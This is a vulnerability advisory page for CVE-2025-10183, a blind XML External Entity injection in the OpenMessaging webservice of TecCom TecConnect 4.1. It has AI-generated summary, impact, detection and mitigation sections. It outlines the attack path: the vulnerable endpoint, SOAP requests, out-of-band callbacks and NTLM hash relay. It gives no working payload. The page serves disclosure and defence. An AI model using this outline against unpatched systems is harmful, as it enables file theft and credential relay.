CVE-2025-10183
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-09-09

Last updated on: 2025-09-09

Assigner: Black Lantern Security

Description
A blind XML External Entity (XXE) injection in the OpenMessaging webservice in TecCom TecConnect 4.1 allows an unauthenticated attacker to exfiltrate arbitrary files to an attacker-controlled server. TecConnect 4.1 is considered end-of-life as of December 2023. Users are advised to upgrade to TecCom Connect 5.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-09-09
Last Modified
2025-09-09
Generated
2026-06-16
AI Q&A
2025-09-09
EPSS Evaluated
2026-06-14
NVD
CVE-2025-10183
EUVD
EUVD-2025-27278
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
teccom tecconnect 5
teccom tecconnect 4.1
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-611 The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2025-10183 is a blind XML External Entity (XXE) injection vulnerability in the OpenMessaging webservice of TecCom TecConnect version 4.1. It allows an unauthenticated attacker to send specially crafted XML payloads that exploit the XML parser to read arbitrary files from the server and send their contents to an attacker-controlled server. The vulnerability involves bypassing error message encodings and leveraging local DTDs to exfiltrate files and relay NTLM hashes, potentially leading to full system compromise. [1]

Impact Analysis

This vulnerability can have severe impacts including unauthorized disclosure of sensitive files from the server, exfiltration of arbitrary data, and escalation to full system compromise through NTLM hash relay attacks. An attacker can read local files, capture authentication hashes, and potentially gain control over the affected system, leading to data breaches and loss of system integrity. [1]

Detection Guidance

Detection can be performed by targeting the vulnerable OpenMessaging webservice endpoint, typically at openmessaging.asmx, with crafted SOAP POST requests containing HTML-encoded XXE payloads. Techniques include sending out-of-band XXE payloads that trigger DNS or HTTP callbacks to an attacker-controlled server (e.g., Burp Collaborator) to confirm vulnerability. Tools and methods used include IIS Shortname Enumeration to locate endpoints, Wsdler to parse WSDL, and Burp Suite Repeater for sending crafted requests. Additionally, monitoring for unusual outbound DNS or HTTP requests from the server may indicate exploitation attempts. Specific commands are not provided, but usage of Burp Suite with crafted SOAP requests and monitoring network callbacks is recommended. [1]

Mitigation Strategies

The immediate mitigation step is to upgrade from the vulnerable TecCom TecConnect 4.1, which is end-of-life as of December 2023, to TecCom Connect 5. This upgrade addresses the vulnerability. Since the vulnerable component is the OpenMessaging webservice at openmessaging.asmx, restricting or disabling access to this endpoint until upgrade may also reduce risk. Additionally, monitoring and blocking suspicious outbound network traffic related to XXE exploitation attempts can help mitigate impact. [1]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-10183. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart